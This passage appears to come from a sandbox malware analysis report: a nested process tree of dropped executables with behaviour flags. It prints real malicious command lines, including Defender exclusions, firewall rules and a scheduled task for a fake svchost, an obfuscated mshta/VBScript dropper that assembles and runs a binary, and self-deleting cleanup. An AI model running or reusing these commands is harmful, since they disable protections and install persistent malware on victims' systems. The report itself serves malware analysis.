                                                                                                        8⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:5468
                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\hAG6FiISyX0l0OSgS67GwpKi.exe
                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\hAG6FiISyX0l0OSgS67GwpKi.exe"
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:5008
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\hAG6FiISyX0l0OSgS67GwpKi.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\hAG6FiISyX0l0OSgS67GwpKi.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks SCSI registry key(s)
                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                      PID:5728
                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\npSdL9MQypvka7Ndusi2uNID.exe
                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\npSdL9MQypvka7Ndusi2uNID.exe"
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:4616
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\npSdL9MQypvka7Ndusi2uNID.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\npSdL9MQypvka7Ndusi2uNID.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:2348
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2348 -s 960
                                                                                                        8⤵
                                                                                                        • Program crash
                                                                                                        PID:7652
                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\V2G3P1azJYqYxfYm5ntajmyY.exe
                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\V2G3P1azJYqYxfYm5ntajmyY.exe"
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    • Checks processor information in registry
                                                                                                    PID:4424
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im V2G3P1azJYqYxfYm5ntajmyY.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\V2G3P1azJYqYxfYm5ntajmyY.exe" & del C:\ProgramData\*.dll & exit
                                                                                                      7⤵
                                                                                                        PID:4576
                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                          taskkill /im V2G3P1azJYqYxfYm5ntajmyY.exe /f
                                                                                                          8⤵
                                                                                                          • Kills process with taskkill
                                                                                                          PID:7800
                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                          timeout /t 6
                                                                                                          8⤵
                                                                                                          • Delays execution with timeout.exe
                                                                                                          PID:5908
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\x2ZvO4L0Il5a8Ag_PrF_swNq.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\x2ZvO4L0Il5a8Ag_PrF_swNq.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Checks whether UAC is enabled
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      PID:2544
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\CMq4Uuqwx0wCDhfdhMSWMzwy.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\CMq4Uuqwx0wCDhfdhMSWMzwy.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:812
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\CMq4Uuqwx0wCDhfdhMSWMzwy.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\CMq4Uuqwx0wCDhfdhMSWMzwy.exe"
                                                                                                        7⤵
                                                                                                          PID:4588
                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\CMq4Uuqwx0wCDhfdhMSWMzwy.exe
                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\CMq4Uuqwx0wCDhfdhMSWMzwy.exe"
                                                                                                          7⤵
                                                                                                            PID:1236
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 812 -s 1772
                                                                                                            7⤵
                                                                                                            • Program crash
                                                                                                            PID:7660
                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\j1fuTQeHJ5nHfI7QBxEOWfFx.exe
                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\j1fuTQeHJ5nHfI7QBxEOWfFx.exe"
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:3712
                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\j1fuTQeHJ5nHfI7QBxEOWfFx.exe
                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\j1fuTQeHJ5nHfI7QBxEOWfFx.exe"
                                                                                                            7⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:1308
                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\XlqQ6AiRWNzp79TAr8LchxFE.exe
                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\XlqQ6AiRWNzp79TAr8LchxFE.exe"
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Checks BIOS information in registry
                                                                                                          • Checks whether UAC is enabled
                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                          PID:1064
                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\WLvKE63KBQvfboeZ6TZhPjre.exe
                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\WLvKE63KBQvfboeZ6TZhPjre.exe"
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Checks BIOS information in registry
                                                                                                          • Checks whether UAC is enabled
                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                          PID:2184
                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\VdktkMSBrkhYeaCqaQESx84r.exe
                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\VdktkMSBrkhYeaCqaQESx84r.exe"
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Checks BIOS information in registry
                                                                                                          • Checks whether UAC is enabled
                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                          PID:4292
                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\I5dkJkr4oEQHzIJW6e8jjgHH.exe
                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\I5dkJkr4oEQHzIJW6e8jjgHH.exe"
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4596
                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\31JaDpwAgX80goY2NTqaunra.exe
                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\31JaDpwAgX80goY2NTqaunra.exe"
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Windows security modification
                                                                                                          • Checks whether UAC is enabled
                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          • System policy modification
                                                                                                          PID:4532
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2eabbac6-8321-4eb3-a5f9-2fa0515d948d\AdvancedRun.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\2eabbac6-8321-4eb3-a5f9-2fa0515d948d\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\2eabbac6-8321-4eb3-a5f9-2fa0515d948d\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                            7⤵
                                                                                                              PID:7816
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\2eabbac6-8321-4eb3-a5f9-2fa0515d948d\AdvancedRun.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\2eabbac6-8321-4eb3-a5f9-2fa0515d948d\AdvancedRun.exe" /SpecialRun 4101d8 7816
                                                                                                                8⤵
                                                                                                                  PID:8000
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\31JaDpwAgX80goY2NTqaunra.exe" -Force
                                                                                                                7⤵
                                                                                                                  PID:7752
                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\31JaDpwAgX80goY2NTqaunra.exe" -Force
                                                                                                                  7⤵
                                                                                                                    PID:7952
                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\31JaDpwAgX80goY2NTqaunra.exe
                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\31JaDpwAgX80goY2NTqaunra.exe"
                                                                                                                    7⤵
                                                                                                                      PID:6140
                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\31JaDpwAgX80goY2NTqaunra.exe
                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\31JaDpwAgX80goY2NTqaunra.exe"
                                                                                                                      7⤵
                                                                                                                        PID:3168
                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\rZtlXMJwGQlpd3Aj4lFzPANE.exe
                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\rZtlXMJwGQlpd3Aj4lFzPANE.exe"
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:5016
                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\icU3fv6sE92Tiwl3bXZ9je5v.exe
                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\icU3fv6sE92Tiwl3bXZ9je5v.exe"
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Loads dropped DLL
                                                                                                                      • Checks processor information in registry
                                                                                                                      • NTFS ADS
                                                                                                                      PID:3424
                                                                                                                      • C:\ProgramData\5U82VG7A5TQW5HY0.exe
                                                                                                                        "C:\ProgramData\5U82VG7A5TQW5HY0.exe"
                                                                                                                        7⤵
                                                                                                                          PID:5080
                                                                                                                          • C:\Windows\System32\conhost.exe
                                                                                                                            "C:\Windows\System32\conhost.exe" "C:\ProgramData\5U82VG7A5TQW5HY0.exe"
                                                                                                                            8⤵
                                                                                                                              PID:6636
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im icU3fv6sE92Tiwl3bXZ9je5v.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\icU3fv6sE92Tiwl3bXZ9je5v.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                            7⤵
                                                                                                                              PID:4800
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                taskkill /im icU3fv6sE92Tiwl3bXZ9je5v.exe /f
                                                                                                                                8⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                PID:4664
                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                timeout /t 6
                                                                                                                                8⤵
                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                PID:4448
                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\QR6Tp_Y6pYxMoGk8Rmh2kMOd.exe
                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\QR6Tp_Y6pYxMoGk8Rmh2kMOd.exe"
                                                                                                                            6⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:5228
                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\FcLKPw2AfxwqlAtE13xgLqRc.exe
                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\FcLKPw2AfxwqlAtE13xgLqRc.exe"
                                                                                                                            6⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:5448
                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                              "C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\FcLKPw2AfxwqlAtE13xgLqRc.exe"" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF """" == """" for %I iN ( ""C:\Users\Admin\Pictures\Adobe Films\FcLKPw2AfxwqlAtE13xgLqRc.exe"" ) do taskkill -iM ""%~NXI"" -f " , 0 , tRue ) )
                                                                                                                              7⤵
                                                                                                                                PID:6024
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\FcLKPw2AfxwqlAtE13xgLqRc.exe" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02& iF "" == "" for %I iN ( "C:\Users\Admin\Pictures\Adobe Films\FcLKPw2AfxwqlAtE13xgLqRc.exe" ) do taskkill -iM "%~NXI" -f
                                                                                                                                  8⤵
                                                                                                                                    PID:2708
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE
                                                                                                                                      ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02
                                                                                                                                      9⤵
                                                                                                                                        PID:6408
                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                          "C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE"" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF ""-PMDrnm85Xpfala4uMu02"" == """" for %I iN ( ""C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE"" ) do taskkill -iM ""%~NXI"" -f " , 0 , tRue ) )
                                                                                                                                          10⤵
                                                                                                                                            PID:6664
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02& iF "-PMDrnm85Xpfala4uMu02" == "" for %I iN ( "C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE" ) do taskkill -iM "%~NXI" -f
                                                                                                                                              11⤵
                                                                                                                                                PID:5960
                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                              "C:\Windows\System32\mshta.exe" vBScripT: clOse ( cREaTeObJECT ( "wscRIPt.SHELL" ). rUN ( "cMd /q /R Echo | SeT /P = ""MZ"" > 9Ym~JXRX.Lb3 & COpY /b /Y 9YM~jXrX.Lb3+ OFnDRVX.8L3 + n7gDJN.Z + S0esI.qY + VOPW5P.PE + qDrS.CQ~ + U78WYSY.oFM +f36Uy3.T ..\bJUC.L & DEl /q *& STArt msiexec.exe /Y ..\bjUC.l " , 0 , trUE ) )
                                                                                                                                              10⤵
                                                                                                                                                PID:7244
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /q /R Echo | SeT /P = "MZ" > 9Ym~JXRX.Lb3 & COpY /b /Y 9YM~jXrX.Lb3+ OFnDRVX.8L3+ n7gDJN.Z + S0esI.qY + VOPW5P.PE + qDrS.CQ~ + U78WYSY.oFM +f36Uy3.T ..\bJUC.L & DEl /q *& STArt msiexec.exe /Y ..\bjUC.l
                                                                                                                                                  11⤵
                                                                                                                                                    PID:1252
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" Echo "
                                                                                                                                                      12⤵
                                                                                                                                                        PID:1676
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>9Ym~JXRX.Lb3"
                                                                                                                                                        12⤵
                                                                                                                                                          PID:5172
                                                                                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          msiexec.exe /Y ..\bjUC.l
                                                                                                                                                          12⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:4600
                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                    taskkill -iM "FcLKPw2AfxwqlAtE13xgLqRc.exe" -f
                                                                                                                                                    9⤵
                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                    PID:7072
                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\CM3qc1ZUHTot8rk1cPNjlC9I.exe
                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\CM3qc1ZUHTot8rk1cPNjlC9I.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Drops startup file
                                                                                                                                              PID:5560
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MjpFiZVjH.exe
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MjpFiZVjH.exe"
                                                                                                                                                7⤵
                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                PID:6780
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                                  8⤵
                                                                                                                                                    PID:6052
                                                                                                                                                  • C:\Windows\System32\netsh.exe
                                                                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                    8⤵
                                                                                                                                                      PID:1364
                                                                                                                                                    • C:\Windows\System32\netsh.exe
                                                                                                                                                      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                      8⤵
                                                                                                                                                        PID:7052
                                                                                                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                        schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                                                                        8⤵
                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                        PID:6892
                                                                                                                                                      • C:\Windows\System\svchost.exe
                                                                                                                                                        "C:\Windows\System\svchost.exe" formal
                                                                                                                                                        8⤵
                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                        PID:6688
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                                          9⤵
                                                                                                                                                            PID:7024
                                                                                                                                                          • C:\Windows\System32\netsh.exe
                                                                                                                                                            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                            9⤵
                                                                                                                                                              PID:7196
                                                                                                                                                            • C:\Windows\System32\netsh.exe
                                                                                                                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                              9⤵
                                                                                                                                                                PID:7216
                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\_LIy17AGUu5AZDC2scrEd4z7.exe
                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\_LIy17AGUu5AZDC2scrEd4z7.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                          PID:5504
                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\LnCXYPlekZXBQhqmQE3h5apE.exe
                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\LnCXYPlekZXBQhqmQE3h5apE.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                          PID:5408
                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\Q5H8lZHKwQr1oIK2p260ZyCn.exe
                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\Q5H8lZHKwQr1oIK2p260ZyCn.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:7804
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                            7⤵
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                            PID:7688
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--DzBsjyZ8js"
                                                                                                                                                              8⤵
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                              PID:2188
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b8,0x1e8,0x7ffeed34dec0,0x7ffeed34ded0,0x7ffeed34dee0
                                                                                                                                                                9⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                PID:8148
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1628,14149606048835169013,8906988069361736993,131072 --lang=de --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2188_1508909315" --mojo-platform-channel-handle=1736 /prefetch:8
                                                                                                                                                                9⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                PID:772
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1628,14149606048835169013,8906988069361736993,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2188_1508909315" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1688 /prefetch:2
                                                                                                                                                                9⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                PID:6284
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1628,14149606048835169013,8906988069361736993,131072 --lang=de --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2188_1508909315" --mojo-platform-channel-handle=2080 /prefetch:8
                                                                                                                                                                9⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                PID:8136
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1628,14149606048835169013,8906988069361736993,131072 --lang=de --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2188_1508909315" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2588 /prefetch:1
                                                                                                                                                                9⤵
                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                PID:2772
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1628,14149606048835169013,8906988069361736993,131072 --lang=de --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2188_1508909315" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2676 /prefetch:1
                                                                                                                                                                9⤵
                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                PID:1108
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,14149606048835169013,8906988069361736993,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2188_1508909315" --mojo-platform-channel-handle=3044 /prefetch:8
                                                                                                                                                                9⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                PID:6468
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1628,14149606048835169013,8906988069361736993,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2188_1508909315" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3084 /prefetch:2
                                                                                                                                                                9⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                PID:1216
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,14149606048835169013,8906988069361736993,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2188_1508909315" --mojo-platform-channel-handle=3660 /prefetch:8
                                                                                                                                                                9⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                PID:6024
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
